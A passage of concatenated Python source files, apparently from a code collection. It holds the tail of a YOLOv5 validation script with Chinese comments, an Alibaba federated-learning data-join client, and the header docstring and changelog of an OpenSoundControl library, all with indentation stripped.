detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project='runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
"""
:param model: 测试的模型,训练时调用val传入
:param dataloader: 测试集的dataloader,训练时调用val传入
:param save_dir: 保存在测试时第一个batch的图片上画出标签框和预测框的图片路径
:param plots: 是否绘制各种可视化,比如测试预测,混淆矩阵,PR曲线等
:param wandb_looger: wandb可视化工具, train的时候传入
:param compute_loss: 计算损失的对象实例, train的时候传入
"""
# Initialize/load model and set device
# 判断是否在训练时调用val,如果是则获取训练时的设备
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
# 选择设备
device = select_device(device, batch_size=batch_size)
# Directories
# 获取保存日志路径
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
# 加载模型
check_suffix(weights, '.pt')
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
# 检查输入图片分辨率是否能被gs=32整除
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
# 加载数据配置信息
data = check_dataset(data) # check
# Half
# 如果设备不是cpu且opt.half=True,则将模型由Float32转为Float16,提高前向传播的速度
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
# 判断是否为coco数据集
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
# 设置iou阈值,从0.5~0.95,每间隔0.05取一次
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
# iou个数
niou = iouv.numel()
# Dataloader
if not training:
# 创建一个全0数组测试一下前向传播是否正常运行
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
# 注意这里rect参数为True,yolov5的测试评估是基于矩形推理的, 且有个0.5的填充
seen = 0
# 初始化测试的图片数量
confusion_matrix = ConfusionMatrix(nc=nc)
# 获取类别的名字
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
"""
获取coco数据集的类别索引
这里要说明一下,coco数据集有80个类别(索引范围应该为0~79),
但是他的索引却属于0~90
coco80_to_coco91_class()就是为了与上述索引对应起来,返回一个范围在0~90的索引数组
"""
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
# 设置tqdm进度条的显示信息
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
# 初始化指标,时间
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
# 初始化测试集的损失
loss = torch.zeros(3, device=device)
# 初始化json文件的字典,统计信息,ap, wandb显示图片
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
"""
time_synchronized()函数里面进行了torch.cuda.synchronize(),再返回的time.time()
torch.cuda.synchronize()等待gpu上完成所有的工作
总的来说就是这样测试时间会更准确
"""
t1 = time_sync()
img = img.to(device, non_blocking=True)
# 图片也由Float32->Float16
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t2 = time_sync()
# 计算数据拷贝,类型转换以及除255的时间
dt[0] += t2 - t1
# Run model
# 前向传播
# out为预测结果, train_out训练结果
out, train_out = model(img, augment=augment) # inference and training outputs
# 计算推理时间
dt[1] += time_sync() - t2
# Compute loss
# 如果是在训练时进行的val,则通过训练结果计算并返回测试集的box, obj, cls损失
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# Run NMS
# 将归一化标签框反算到基于原图大小,如果设置save-hybrid则传入nms函数
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
# 进行nms
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Statistics per image
# 为每一张图片做统计, 写入预测信息到txt文件, 生成json文件字典, 统计tp等
for si, pred in enumerate(out):
# 获取第si张图片的标签信息, 包括class,x,y,w,h
# targets[:, 0]为标签属于哪一张图片的编号
labels = targets[targets[:, 0] == si, 1:]
# 获取标签类别
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
# 统计测试图片数量
seen += 1
# 如果预测为空,则添加空的信息到stats里
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
# 反算坐标 基于input-size -> 基于原图大小
scale_coords(img[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, img[si])
# Plot images
# 画出前三个batch的图片的ground truth和预测框并保存
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
# 统计计算:讲stats列表的信息拼接在一起
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
# 根据上面得到的tp等信息计算指标
# 精准度TP/TP+FP,召回率TP/P,map,f1分数,类别
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
# nt是一个列表,测试集每个类别有多少个标签框
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
# 打印指标结果
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
# 细节展示每一个类别的指标
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
# 打印前处理时间,前向传播耗费的时间、nms的时间
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
# 绘制混淆矩阵
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
# 采用之前保存的json格式预测结果,通过cocoapi评估指标
# 需要注意的是 测试集的标签也需要转成coco的json格式
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
# 获取标签json文件路径
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
# 获取预测框的json文件路径并保存
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
# 加载标签json文件, 预测json文件
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
# 创建评估器
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
# 评估
eval.evaluate()
eval.accumulate()
# 展示结果
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
# 返回测试指标结果
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
"""
opt参数详解
data:数据集配置文件,数据集路径,类名等
weights:测试的模型权重文件
batch-size:前向传播时的批次, 默认32
imgsz:输入图片分辨率大小, 默认640
conf-thres:筛选框的时候的置信度阈值, 默认0.001
iou-thres:进行NMS的时候的IOU阈值, 默认0.65
task:设置测试形式, 默认val, 具体可看下面代码解析注释
device:测试的设备,cpu;0(表示一个gpu设备cuda:0);0,1,2,3(多个gpu设备)
single-cls:数据集是否只有一个类别,默认False
verbose:是否打印出每个类别的mAP, 默认False
save-txt:是否以txt文件的形式保存模型预测的框坐标, 默认False
save-hybrid:是否将label与pred一起保存到txt文件中,默认False
save-conf:是否将置信度conf也保存到txt中,默认False
save-json:是否按照coco的json格式保存预测框,并且使用cocoapi做评估(需要同样coco的json格式的标签), 默认False
project:保存测试日志的文件夹路径
name:保存测试日志文件夹的名字, 所以最终是保存在project/name中
exist_ok: 是否重新创建日志文件, False时重新创建文件
half:是否使用F16精度推理
"""
parser = argparse.ArgumentParser(prog='val.py')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default='runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
# 设置参数save_json
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
# ccheck_yaml检查文件是否存在
opt.data = check_yaml(opt.data) # check YAML
return opt
def main(opt):
# 初始化logging
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(requirements=FILE.parent / 'support/requirements.txt', exclude=('tensorboard', 'thop'))
# 检查环境
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
# 评估模型速度
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
# task == 'study'时,就评估模型在各个尺度下的指标并可视化
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
client_no_tf.py
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import shutil
import time
import queue
import random
import threading
from functools import cmp_to_key
import mmh3
from xfl.common.common import RunMode
from xfl.common.logger import log
from xfl.data import utils
from xfl.data.check_sum import CheckSum
from xfl.data.store.sample_kv_store import DictSampleKvStore
from xfl.data.store.etcd_kv_store import EtcdSampleKvStore
from xfl.data.utils import get_sample_store_key, split_sample_store_key
from xfl.service.data_join_client import create_data_join_client
from xfl.data.tfreecord.tfreecord import RecordReader, RecordWriter
class DefaultKeySelector:
def __init__(self, bucket_num: int = 64):
self._bucket_num = bucket_num
def get_key(self, value):
return mmh3.hash(value[0]) % self._bucket_num
SAMPLE_STORE_TYPE = {
"memory": DictSampleKvStore,
"etcd": EtcdSampleKvStore
}
def record_cmp(left, right):
a = split_sample_store_key(left)
b = split_sample_store_key(right)
if a[1] < b[1]:
return -1
if a[1] > b[1]:
return 1
if a[0] < b[0]:
return -1
if a[0] > b[0]:
return 1
return 0
def getKeyBytes(feature):
if feature is None:
raise RuntimeError("Null feature Input")
if feature.bytes_list.value:
return feature.bytes_list.value[0]
elif feature.int64_list.value:
return bytes(str(feature.int64_list.value[0]), 'utf-8')
elif feature.float_list.value:
return bytes(str(feature.float_list.value[0]), 'utf-8')
else:
raise RuntimeError("Feature Type Error!")
def get_value_from_example(example, hash_col_name, sort_col_name):
return getKeyBytes(example.features.feature[hash_col_name]), getKeyBytes(example.features.feature[sort_col_name])
class ClientSortJoinFunc_local(object):
def __init__(
self,
job_name: str,
peer_host: str,
peer_ip: str,
peer_port: int,
bucket_num: int = 64,
cmp_func=record_cmp,
sample_store_cls=DictSampleKvStore,
batch_size: int = 2048,
wait_s: int = 1800,
tls_crt: str = '',
run_mode: RunMode = RunMode.LOCAL,
output_bucket_file='',
bucket_id=0,
hash_col_name='',
sort_col_name=''):
self._job_name = job_name
self._bucket_num = bucket_num
self._state = None
self._delay = 10000
self._cmp_func = cmp_func
self._sample_store_cls = sample_store_cls
self._peer_host = peer_host
self._peer_ip = peer_ip
self._peer_port = peer_port
self._batch_size = batch_size
self._run_mode = run_mode
self._wait_s = wait_s
self._tls_crt = tls_crt
self._output_bucket_file = output_bucket_file
self._bucket_id = bucket_id
self._hash_col_name = hash_col_name
self._sort_col_name = sort_col_name
if self._sample_store_cls is DictSampleKvStore:
self._sample_store = DictSampleKvStore()
else:
raise RuntimeError("sample_store_cls is not supported by now{}".format(self._sample_store_cls))
self.cnt = 0
def data_join_client_bucket_file(self, bucket_dir_path):
tf_reader = RecordReader()
tf_writer = RecordWriter()
for now_path, subfolder, files in os.walk(bucket_dir_path):
for filename in files:
bucket_file_path = os.path.join(now_path, filename)
raw_dataset = tf_reader.read_from_tfrecord(bucket_file_path)
for raw_record in raw_dataset:
example = tf_reader.example
example.ParseFromString(raw_record)
value0, value1 = get_value_from_example(example, self._hash_col_name, self._sort_col_name)
value = (value0, value1, raw_record)
self._sample_store.put(get_sample_store_key(value[0], value[1]), value[2])
self.cnt += 1
log.info("")
keys_to_join = sorted(self._sample_store.keys(), key=cmp_to_key(self._cmp_func))
if self._run_mode == RunMode.K8S:
if self._tls_crt is None or len(self._tls_crt) == 0:
raise RuntimeError("tls crt should not be empty in k8s mode client job!")
client_port = self._peer_port
if self._run_mode == RunMode.LOCAL:
client_port = client_port + self._bucket_id
client = create_data_join_client(host=self._peer_host,
ip=self._peer_ip,
port=client_port,
job_name=self._job_name,
bucket_id=self._bucket_id,
run_mode=self._run_mode,
tls_crt=self._tls_crt)
check_sum = CheckSum()
client.wait_ready(timeout=self._wait_s)
log.info(
"Client begin to join, bucket id:{}, all size:{}, unique size:{}".format(self._bucket_id, self.cnt,
len(keys_to_join)))
cur = 0
while cur < len(keys_to_join):
end = min(cur + self._batch_size, len(keys_to_join))
request_ids = keys_to_join[cur:end]
existence = client.sync_join(request_ids)
res_ids = utils.gather_res(request_ids, existence=existence)
check_sum.add_list(res_ids)
cur = end
for i in res_ids:
self._output_bucket_file.write(tf_writer.encode_example(self._sample_store.get(i)))
log.info("client sync join current idx: {}, all: {}".format(cur, len(keys_to_join)))
log.info("End join, checkSum:{}".format(check_sum.get_check_sum()))
res = client.finish_join(check_sum.get_check_sum())
self._sample_store.clear()
if not res:
raise ValueError("Join finish error")
class data_join_pipeline_local_no_tf(object):
def __init__(self,
input_path: str,
output_path: str,
job_name: str,
host: str,
port: int,
ip: str,
bucket_num: int,
run_mode: str,
hash_col_name: str,
sort_col_name: str,
is_server: bool,
sample_store_type: str,
batch_size: int,
file_part_size: int,
tls_crt_path: str,
wait_s: int = 1800,
use_psi: bool = False,
need_sort: bool = False,
conf: dict = {}):
self._input_path = input_path
self._output_path = output_path
self._job_name = job_name
self._bucket_num = bucket_num
self._state = None
self._delay = 10000
self._sample_store_cls = SAMPLE_STORE_TYPE[sample_store_type]
self._peer_host = host
self._peer_ip = ip
self._peer_port = port
self._batch_size = batch_size
self._run_mode = RunMode(run_mode)
self._hash_col_name = hash_col_name
self._sort_col_name = sort_col_name
self._wait_s = wait_s
self._bucket_path = os.path.join(self._output_path, 'tmp_bucket')
self._DefaultKeySelector = DefaultKeySelector(bucket_num=bucket_num)
self._data_to_bucket_threads_num = self._bucket_num
self._data_to_bucket_file_list_sum = []
self._data_to_bucket_file_name = "{}_{}.tfrecords"
self._data_to_bucket_threads_queue = queue.Queue()
self._data_to_bucket_threads_data_buffer = []
self._data_to_bucket_now_threads = []
self._data_to_bucket_batch_size = batch_size
tls_crt = b''
if tls_crt_path is not None:
with open(tls_crt_path, 'rb') as f:
tls_crt = f.read()
log.info("tls path:{} \n tls value:{}".format(tls_crt_path, tls_crt))
self._tls_crt = tls_crt
def read_buffer_data_to_bucket(self, thread_id):
tf_reader = RecordReader()
tf_writer = RecordWriter()
for raw_record in self._data_to_bucket_threads_data_buffer[thread_id]:
example = tf_reader.example
example.ParseFromString(raw_record)
value0, value1 = get_value_from_example(example, self._hash_col_name, self._sort_col_name)
value = (value0, value1, raw_record)
bucket_id = self._DefaultKeySelector.get_key(value)
self._data_to_bucket_file_list_sum[thread_id][bucket_id].write(tf_writer.encode_example(example.SerializeToString()))
self._data_to_bucket_threads_data_buffer[thread_id].clear()
self._data_to_bucket_now_threads[thread_id] = None
self._data_to_bucket_threads_queue.put(thread_id)
def read_tf_record_data_to_bucket(self):
# Multithreading preparation
if not os.path.exists(self._bucket_path):
os.makedirs(self._bucket_path)
for worker in range(self._data_to_bucket_threads_num):
_data_to_bucket_file_list = []
for i in range(self._bucket_num):
bucket_dir_path = os.path.join(self._bucket_path, str(i))
if not os.path.exists(bucket_dir_path):
os.makedirs(bucket_dir_path)
bucket_file_path = os.path.join(bucket_dir_path, self._data_to_bucket_file_name.format(i, worker))
bucket_file = open(bucket_file_path, 'ab')
_data_to_bucket_file_list.append(bucket_file)
self._data_to_bucket_file_list_sum.append(_data_to_bucket_file_list)
self._data_to_bucket_threads_queue.put(worker)
self._data_to_bucket_threads_data_buffer.append([])
self._data_to_bucket_now_threads.append(None)
now_thread = None
tf_reader = RecordReader()
for now_path, subfolder, files in os.walk(self._input_path):
for _file in files:
filename = os.path.join(now_path, _file)
raw_dataset_tmp = tf_reader.read_from_tfrecord(filename)
raw_dataset = []
for raw_record in raw_dataset_tmp:
raw_dataset.append(raw_record)
size_data = len(raw_dataset)
now_whe = 0
while True:
if now_thread is None:
if self._data_to_bucket_threads_queue.empty():
time.sleep(1)
continue
now_thread = self._data_to_bucket_threads_queue.get()
if len(self._data_to_bucket_threads_data_buffer[now_thread]) + size_data - now_whe \
< self._data_to_bucket_batch_size:
self._data_to_bucket_threads_data_buffer[now_thread] += raw_dataset[now_whe:]
break
elif len(self._data_to_bucket_threads_data_buffer[now_thread]) + size_data - now_whe \
< 2 * self._data_to_bucket_batch_size:
self._data_to_bucket_threads_data_buffer[now_thread] += raw_dataset[now_whe:]
thread_worker = threading.Thread(target=self.read_buffer_data_to_bucket, args=(now_thread,))
self._data_to_bucket_now_threads[now_thread] = thread_worker
thread_worker.start()
now_thread = None
break
else:
empty_size = self._data_to_bucket_batch_size - \
len(self._data_to_bucket_threads_data_buffer[now_thread])
self._data_to_bucket_threads_data_buffer[now_thread] += \
raw_dataset[now_whe:now_whe + empty_size]
thread_worker = threading.Thread(target=self.read_buffer_data_to_bucket, args=(now_thread,))
self._data_to_bucket_now_threads[now_thread] = thread_worker
thread_worker.start()
now_whe += empty_size
now_thread = None
for thread_worker in self._data_to_bucket_now_threads:
if thread_worker is not None:
thread_worker.join()
for _data_to_bucket_file_list in self._data_to_bucket_file_list_sum:
for bucket_file in _data_to_bucket_file_list:
bucket_file.close()
def worker_for_data_join_bucket(self, bucket_id):
bucket_dir_path = os.path.join(self._bucket_path, str(bucket_id))
output_bucket_dir_path = os.path.join(self._output_path, str(bucket_id))
if not os.path.exists(output_bucket_dir_path):
os.makedirs(output_bucket_dir_path)
output_bucket_file_path = os.path.join(output_bucket_dir_path, str(bucket_id) + '.tfrecords')
output_bucket_file = open(output_bucket_file_path, 'ab')
tmp_client = ClientSortJoinFunc_local(
job_name=self._job_name,
peer_host=self._peer_host,
peer_ip=self._peer_ip,
peer_port=self._peer_port,
bucket_num=self._bucket_num,
sample_store_cls=self._sample_store_cls,
batch_size=self._batch_size,
run_mode=self._run_mode,
wait_s=self._wait_s,
tls_crt=self._tls_crt,
output_bucket_file=output_bucket_file,
bucket_id=bucket_id,
hash_col_name=self._hash_col_name,
sort_col_name=self._sort_col_name)
tmp_client.data_join_client_bucket_file(bucket_dir_path)
output_bucket_file.close()
def data_join_client_workers(self):
threads_list = []
for i in range(self._bucket_num):
thread_worker = threading.Thread(target=self.worker_for_data_join_bucket, args=(i,))
threads_list.append(thread_worker)
thread_worker.start()
for thread_worker in threads_list:
thread_worker.join()
shutil.rmtree(self._bucket_path)
def run(self):
self.read_tf_record_data_to_bucket()
self.data_join_client_workers()
return "Program execution finished"
|
OSC.py
|
#!/usr/bin/python3
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
